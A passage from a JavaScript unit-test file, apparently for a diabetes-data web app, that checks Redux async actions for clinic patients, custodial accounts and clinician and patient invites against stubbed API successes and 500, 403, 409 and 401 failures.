Error(ErrorMessages.ERR_FETCHING_PATIENTS_FOR_CLINIC); err.status = 500; let expectedActions = [ { type: 'FETCH_PATIENTS_FOR_CLINIC_REQUEST' }, { type: 'FETCH_PATIENTS_FOR_CLINIC_FAILURE', error: err, meta: { apiError: { status: 500, body: 'Error!'
// --- fetchPatientsForClinic 500-failure assertions, then [403] unauthorized variant ---
} }, payload: { clinicId: '5f85fbe6686e6bb9170ab5d0' }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientsForClinic(api, '5f85fbe6686e6bb9170ab5d0')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENTS_FOR_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientsForClinic.callCount).to.equal(1); }); it('[403] should trigger FETCH_PATIENTS_FOR_CLINIC_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { getPatientsForClinic: sinon.stub() .callsArgWith(2, { status: 403, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_FETCHING_PATIENTS_FOR_CLINIC_UNAUTHORIZED ); err.status = 403; let expectedActions = [ { type: 'FETCH_PATIENTS_FOR_CLINIC_REQUEST' }, { type: 'FETCH_PATIENTS_FOR_CLINIC_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!'
// --- close of [403] patients test; describe('fetchPatientFromClinic'): success test and start of 500-failure test ---
} }, payload: { clinicId: '5f85fbe6686e6bb9170ab5d0' }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch( async.fetchPatientsForClinic(api, '5f85fbe6686e6bb9170ab5d0') ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENTS_FOR_CLINIC_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientsForClinic.callCount).to.equal(1); }); }); describe('fetchPatientFromClinic', () => { it('should trigger FETCH_PATIENT_FROM_CLINIC_SUCCESS and it should call clinics.getPatientFromClinic once for a successful request', () => { let patientUserId = 'patient_userId'; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patientId = 'patient_clinic_relationship_id'; let patient = { id: patientId, patientId: patientUserId, } let api = { clinics: { getPatientFromClinic: sinon.stub().callsArgWith(2, null, patient), }, }; let expectedActions = [ { type: 'FETCH_PATIENT_FROM_CLINIC_REQUEST' }, { type: 'FETCH_PATIENT_FROM_CLINIC_SUCCESS', payload: { patient, clinicId, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientFromClinic(api, clinicId, patientUserId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientFromClinic.callCount).to.equal(1); }); it('should trigger FETCH_PATIENT_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { let patientUserId = 'patient_userId'; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { getPatientFromClinic: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_FROM_CLINIC); err.status = 500; let expectedActions = [ { type:
// --- fetchPatientFromClinic 500-failure assertions; describe('createClinicCustodialAccount'):
// success test (patient echoed back, payload carries patientId) and start of 500-failure test.
// NOTE(review): 'patient<PASSWORD>' / '<EMAIL>' style values look like redaction artifacts
// from data processing, not intentional fixtures — verify against the repository original. ---
'FETCH_PATIENT_FROM_CLINIC_REQUEST' }, { type: 'FETCH_PATIENT_FROM_CLINIC_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientFromClinic(api, clinicId, patientUserId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_FROM_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientFromClinic.callCount).to.equal(1); }); }); describe('createClinicCustodialAccount', () => { it('should trigger CREATE_CLINIC_CUSTODIAL_ACCOUNT_SUCCESS and it should call clinics.createClinicCustodialAccount once for a successful request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { fullName: 'patientName', email: 'patient<PASSWORD>', id: 'patient123', }; let api = { clinics: { createClinicCustodialAccount: sinon.stub().callsArgWith(2, null, patient), }, }; let expectedActions = [ { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_REQUEST' }, { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_SUCCESS', payload: { clinicId, patientId: 'patient123', patient, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createClinicCustodialAccount(api, clinicId, patient)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.createClinicCustodialAccount.callCount).to.equal(1); }); it('should trigger CREATE_CLINIC_CUSTODIAL_ACCOUNT_FAILURE and it should call error once for a failed request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { fullName: 'patientName', email: 'patientemail' }; let api = { clinics: { createClinicCustodialAccount: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new
// --- createClinicCustodialAccount 500-failure assertions, then [403] unauthorized variant ---
Error(ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT); err.status = 500; let expectedActions = [ { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_REQUEST' }, { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createClinicCustodialAccount(api, clinicId, patient)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.createClinicCustodialAccount.callCount).to.equal(1); }); it('[403] should trigger CREATE_CLINIC_CUSTODIAL_ACCOUNT_FAILURE and it should call error once for a failed request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { fullName: 'patientName', email: 'patientemail', }; let api = { clinics: { createClinicCustodialAccount: sinon.stub() .callsArgWith(2, { status: 403, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT_UNAUTHORIZED ); err.status = 403; let expectedActions = [ { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_REQUEST' }, { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!'
// --- close of [403] custodial-account test; describe('createVCACustodialAccount'):
// success test (user.createCustodialAccount, payload keyed by userid) and start of 500-failure test ---
} }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch( async.createClinicCustodialAccount(api, clinicId, patient) ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.createClinicCustodialAccount.callCount).to.equal(1); }); }); describe('createVCACustodialAccount', () => { it('should trigger CREATE_VCA_CUSTODIAL_ACCOUNT_SUCCESS and it should call user.createCustodialAccount once for a successful request', () => { let patient = { fullName: 'patientName', email: 'patientemail', userid: 'patient123', }; let api = { user: { createCustodialAccount: sinon.stub().callsArgWith(1, null, patient), }, }; let expectedActions = [ { type: 'CREATE_VCA_CUSTODIAL_ACCOUNT_REQUEST' }, { type: 'CREATE_VCA_CUSTODIAL_ACCOUNT_SUCCESS', payload: { patientId: 'patient123', patient, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createVCACustodialAccount(api, patient)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.createCustodialAccount.callCount).to.equal(1); }); it('should trigger CREATE_VCA_CUSTODIAL_ACCOUNT_FAILURE and it should call error once for a failed request', () => { let patient = { fullName: 'patientName', email: 'patientemail' }; let api = { user: { createCustodialAccount: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT); err.status = 500; let expectedActions = [ { type: 'CREATE_VCA_CUSTODIAL_ACCOUNT_REQUEST' }, { type: 'CREATE_VCA_CUSTODIAL_ACCOUNT_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
// --- createVCACustodialAccount 500-failure assertions; describe('updateClinicPatient'):
// success test (updateClinicPatient stub, payload {clinicId, patientId, patient}) and start of 500-failure ---
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createVCACustodialAccount(api, patient)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.createCustodialAccount.callCount).to.equal(1); }); }); describe('updateClinicPatient', () => { it('should trigger UPDATE_CLINIC_PATIENT_SUCCESS and it should call clinics.updateClinicPatient once for a successful request', () => { let patientUserId = 'patient_userId'; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { id: patientUserId, fullName: 'patientName', email: 'patientemail' }; let api = { clinics: { updateClinicPatient: sinon.stub().callsArgWith(3, null, patient), }, }; let expectedActions = [ { type: 'UPDATE_CLINIC_PATIENT_REQUEST' }, { type: 'UPDATE_CLINIC_PATIENT_SUCCESS', payload: { clinicId, patientId: patientUserId, patient } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateClinicPatient(api, clinicId, patientUserId, patient)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinicPatient.callCount).to.equal(1); }); it('should trigger UPDATE_CLINIC_PATIENT_FAILURE and it should call error once for a failed request', () => { let patientUserId = 'patient_userId'; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { id: patientUserId, fullName: 'patientName', email: 'patientemail' }; let api = { clinics: { updateClinicPatient: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_UPDATING_CLINIC_PATIENT); err.status = 500; let expectedActions = [ { type: 'UPDATE_CLINIC_PATIENT_REQUEST' }, { type:
// --- updateClinicPatient 500-failure assertions, then [403] unauthorized variant ---
'UPDATE_CLINIC_PATIENT_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateClinicPatient(api, clinicId, patientUserId, patient)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_CLINIC_PATIENT }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinicPatient.callCount).to.equal(1); }); it('[403] should trigger UPDATE_CLINIC_PATIENT_FAILURE and it should call error once for a failed request', () => { let patientUserId = 'patient_userId'; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { id: patientUserId, fullName: 'patientName', email: 'patientemail', }; let api = { clinics: { updateClinicPatient: sinon.stub() .callsArgWith(3, { status: 403, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_UPDATING_CLINIC_PATIENT_UNAUTHORIZED ); err.status = 403; let expectedActions = [ { type: 'UPDATE_CLINIC_PATIENT_REQUEST' }, { type: 'UPDATE_CLINIC_PATIENT_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!'
// --- close of [403] updateClinicPatient test; describe('sendClinicianInvite'):
// success test and start of 500-failure test ---
} }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch( async.updateClinicPatient(api, clinicId, patientUserId, patient) ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_CLINIC_PATIENT_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinicPatient.callCount).to.equal(1); }); }); describe('sendClinicianInvite', () => { it('should trigger SEND_CLINICIAN_INVITE_SUCCESS and it should call clinics.inviteClinician once for a successful request', () => { let clinician = { email:'<EMAIL>', roles: ['CLINIC_MEMBER'] }; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { inviteClinician: sinon.stub().callsArgWith(2, null, clinician), }, }; let expectedActions = [ { type: 'SEND_CLINICIAN_INVITE_REQUEST' }, { type: 'SEND_CLINICIAN_INVITE_SUCCESS', payload: { clinicId, clinician } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.sendClinicianInvite(api, clinicId, clinician)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinician.callCount).to.equal(1); }); it('should trigger SEND_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let clinician = { email:'<EMAIL>', roles: ['CLINIC_MEMBER'] }; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { inviteClinician: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_SENDING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'SEND_CLINICIAN_INVITE_REQUEST' }, { type: 'SEND_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => {
expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.sendClinicianInvite(api, clinicId, clinician)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinician.callCount).to.equal(1); }); it('should trigger SEND_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request with a 409 status', () => { let clinician = { email:'<EMAIL>', roles: ['CLINIC_MEMBER'] }; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { inviteClinician: sinon.stub().callsArgWith(2, {status: 409, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_SENDING_CLINICIAN_INVITE_ALREADY_MEMBER); err.status = 409; let expectedActions = [ { type: 'SEND_CLINICIAN_INVITE_REQUEST' }, { type: 'SEND_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 409, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.sendClinicianInvite(api, clinicId, clinician)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_CLINICIAN_INVITE_ALREADY_MEMBER }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinician.callCount).to.equal(1); }); it('should trigger SEND_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request with a 401 status', () => { let clinician = { email: '<EMAIL>', roles: ['CLINIC_MEMBER'], }; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { inviteClinician: sinon.stub() .callsArgWith(2, { status: 401, body: 'Error!' 
}, null), }, }; let err = new Error( ErrorMessages.ERR_SENDING_CLINICIAN_INVITE_UNAUTHORIZED ); err.status = 409; let expectedActions = [ { type: 'SEND_CLINICIAN_INVITE_REQUEST' }, { type: 'SEND_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: { status: 401, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.sendClinicianInvite(api, clinicId, clinician)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_CLINICIAN_INVITE_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinician.callCount).to.equal(1); }); }); describe('fetchClinicianInvite', () => { it('should trigger FETCH_CLINICIAN_INVITE_SUCCESS and it should call clinics.getClinicianInvite once for a successful request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let inviteId = 'inviteId123'; let invite = { key: inviteId } let api = { clinics: { getClinicianInvite: sinon.stub().callsArgWith(2, null, invite), }, }; let expectedActions = [ { type: 'FETCH_CLINICIAN_INVITE_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITE_SUCCESS', payload: { clinicId, invite } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicianInvite.callCount).to.equal(1); }); it('should trigger FETCH_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let inviteId = 'inviteId123'; let api = { clinics: { getClinicianInvite: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new 
Error(ErrorMessages.ERR_FETCHING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINICIAN_INVITE_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicianInvite.callCount).to.equal(1); }); /* A 401 (unauthorized) response should surface the "unauthorized" error message. */ it('should trigger FETCH_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request with a 401 status', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let inviteId = 'inviteId123'; let api = { clinics: { getClinicianInvite: sinon.stub() .callsArgWith(2, { status: 401, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_FETCHING_CLINICIAN_INVITE_UNAUTHORIZED ); err.status = 401; let expectedActions = [ { type: 'FETCH_CLINICIAN_INVITE_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: { status: 401, body: 'Error!'
} }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIAN_INVITE_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicianInvite.callCount).to.equal(1); }); }); /* resendClinicianInvite thunk: REQUEST/SUCCESS and REQUEST/FAILURE (500) action sequences. */ describe('resendClinicianInvite', () => { it('should trigger RESEND_CLINICIAN_INVITE_SUCCESS and it should call clinics.resendClinicianInvite once for a successful request', () => { let inviteId = 'resendinvite' let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { resendClinicianInvite: sinon.stub().callsArgWith(2, null, { }), }, }; let expectedActions = [ { type: 'RESEND_CLINICIAN_INVITE_REQUEST' }, { type: 'RESEND_CLINICIAN_INVITE_SUCCESS', payload: { invite:{}, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.resendClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.resendClinicianInvite.callCount).to.equal(1); }); it('should trigger RESEND_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let inviteId = 'resendinvite' let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { resendClinicianInvite: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_RESENDING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'RESEND_CLINICIAN_INVITE_REQUEST' }, { type: 'RESEND_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store =
mockStore({ blip: initialState }); store.dispatch(async.resendClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_RESENDING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.resendClinicianInvite.callCount).to.equal(1); }); }); /* deleteClinicianInvite thunk: REQUEST/SUCCESS and REQUEST/FAILURE (500, 401) action sequences. */ describe('deleteClinicianInvite', () => { it('should trigger DELETE_CLINICIAN_INVITE_SUCCESS and it should call clinics.deleteClinicianInvite once for a successful request', () => { let clinicId = 'clinicId123'; let inviteId = 'inviteIdABC'; let api = { clinics: { deleteClinicianInvite: sinon.stub().callsArgWith(2, null, {}), }, }; let expectedActions = [ { type: 'DELETE_CLINICIAN_INVITE_REQUEST' }, { type: 'DELETE_CLINICIAN_INVITE_SUCCESS', payload: { clinicId, inviteId, result:{}, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.deleteClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianInvite.callCount).to.equal(1); }); it('should trigger DELETE_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let clinicId = 'clinicId123'; let inviteId = 'inviteIdABC'; let api = { clinics: { deleteClinicianInvite: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_DELETING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'DELETE_CLINICIAN_INVITE_REQUEST' }, { type: 'DELETE_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.deleteClinicianInvite(api, clinicId, inviteId)); const actions =
store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianInvite.callCount).to.equal(1); }); /* A 401 (unauthorized) response should surface the "unauthorized" error message. */ it('should trigger DELETE_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request with a 401 status', () => { let clinicId = 'clinicId123'; let inviteId = 'inviteIdABC'; let api = { clinics: { deleteClinicianInvite: sinon.stub() .callsArgWith(2, { status: 401, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_DELETING_CLINICIAN_INVITE_UNAUTHORIZED ); err.status = 401; let expectedActions = [ { type: 'DELETE_CLINICIAN_INVITE_REQUEST' }, { type: 'DELETE_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: { status: 401, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.deleteClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_CLINICIAN_INVITE_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianInvite.callCount).to.equal(1); }); }); /* sendClinicInvite thunk: patient invites a clinic via share code; REQUEST/SUCCESS and REQUEST/FAILURE sequences. */ describe('sendClinicInvite', () => { it('should trigger SEND_CLINIC_INVITE_SUCCESS and it should call clinics.inviteClinic once for a successful request', () => { let shareCode = 'shareCode123'; let permissions = { view: {} }; let patientId = 'patientIdABC'; let api = { clinics: { inviteClinic: sinon.stub().callsArgWith(3, null, { my: 'invite' }), }, }; let expectedActions = [ { type: 'SEND_CLINIC_INVITE_REQUEST' }, { type: 'SEND_CLINIC_INVITE_SUCCESS', payload: { invite: { my: 'invite' }, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState });
store.dispatch(async.sendClinicInvite(api, shareCode, permissions, patientId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinic.callCount).to.equal(1); }); it('should trigger SEND_CLINIC_INVITE_FAILURE and it should call error once for a failed request', () => { let shareCode = 'shareCode123'; let permissions = { view: {} }; let patientId = 'patientIdABC'; let api = { clinics: { inviteClinic: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_SENDING_CLINIC_INVITE); err.status = 500; let expectedActions = [ { type: 'SEND_CLINIC_INVITE_REQUEST' }, { type: 'SEND_CLINIC_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.sendClinicInvite(api, shareCode, permissions, patientId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_CLINIC_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinic.callCount).to.equal(1); }); }); /* fetchPatientInvites thunk: REQUEST/SUCCESS and REQUEST/FAILURE (500, 401) action sequences. */ describe('fetchPatientInvites', () => { it('should trigger FETCH_PATIENT_INVITES_SUCCESS and it should call clinics.getPatientInvites once for a successful request', () => { let clinicId = 'clinicId345'; let invites = ['invite<PASSWORD>']; /* NOTE(review): fixture id looks redacted ('<PASSWORD>') — confirm the original value against repo history */ let api = { clinics: { getPatientInvites: sinon.stub().callsArgWith(1, null, invites), }, }; let expectedActions = [ { type: 'FETCH_PATIENT_INVITES_REQUEST' }, { type: 'FETCH_PATIENT_INVITES_SUCCESS', payload: { clinicId, invites } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientInvites(api, clinicId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions);
expect(api.clinics.getPatientInvites.callCount).to.equal(1); }); it('should trigger FETCH_PATIENT_INVITES_FAILURE and it should call error once for a failed request', () => { let clinicId = 'clinicId345'; let invites = ['invite<PASSWORD>']; let api = { clinics: { getPatientInvites: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_INVITES); err.status = 500; let expectedActions = [ { type: 'FETCH_PATIENT_INVITES_REQUEST' }, { type: 'FETCH_PATIENT_INVITES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientInvites(api, clinicId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_INVITES }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientInvites.callCount).to.equal(1); }); /* A 401 (unauthorized) response should surface the "unauthorized" error message. */ it('should trigger FETCH_PATIENT_INVITES_FAILURE and it should call error once for a failed request with a 401 status', () => { let clinicId = 'clinicId345'; let invites = ['inviteId1']; let api = { clinics: { getPatientInvites: sinon.stub() .callsArgWith(1, { status: 401, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_FETCHING_PATIENT_INVITES_UNAUTHORIZED ); err.status = 401; let expectedActions = [ { type: 'FETCH_PATIENT_INVITES_REQUEST' }, { type: 'FETCH_PATIENT_INVITES_FAILURE', error: err, meta: { apiError: { status: 401, body: 'Error!'
